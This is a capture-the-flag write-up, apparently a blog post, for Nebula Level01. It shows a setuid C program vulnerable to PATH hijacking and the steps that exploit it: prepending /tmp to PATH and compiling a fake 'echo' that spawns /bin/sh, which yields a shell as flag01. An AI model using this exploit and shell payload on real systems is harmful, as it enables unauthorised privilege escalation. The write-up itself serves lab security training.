The next level, Level01, provides some C code for the user to evaluate. The code contains a vulnerability that allows arbitrary programs to be executed. This post will outline the steps I took to solve the challenge.
I started by reading through the source code in order to locate the vulnerability:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}
Almost immediately, I noticed that “echo” is being called without the absolute path. This is a major security vulnerability because the script will rely on the environment variables of the current shell (which can be tampered with).
Let’s modify our path to include /tmp/:
level01@nebula:/home/flag01$ PATH=/tmp:$PATH
level01@nebula:/home/flag01$ export PATH
level01@nebula:/home/flag01$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
Now that /tmp is in the current path, we can create our own “echo” command. I have included C code below to spawn a shell. I used this code extensively in my OSCP studies as my payload when exploiting Linux/Unix boxes.
#include <unistd.h>
int main() {
char *args[2];
args[0] = "/bin/sh";
args[1] = NULL;
execve(args[0], args, NULL);
}
A nice write-up on the code can be found here if you are curious about the creation and execution.
After creating the new “echo” program, I need to compile the code.
level01@nebula:/tmp$ gcc echo.c -o echo
level01@nebula:/tmp$ ls
echo echo.c vmware-root
Now I can call the original script, which will now run our “echo” program:
level01@nebula:/home/flag01$ id
uid=1002(level01) gid=1002(level01) groups=1002(level01)
level01@nebula:/home/flag01$ ./flag01
sh-4.2$ id
uid=998(flag01) gid=1002(level01) groups=998(flag01),1002(level01)
sh-4.2$ getflag
You have successfully executed getflag on a target account
Success!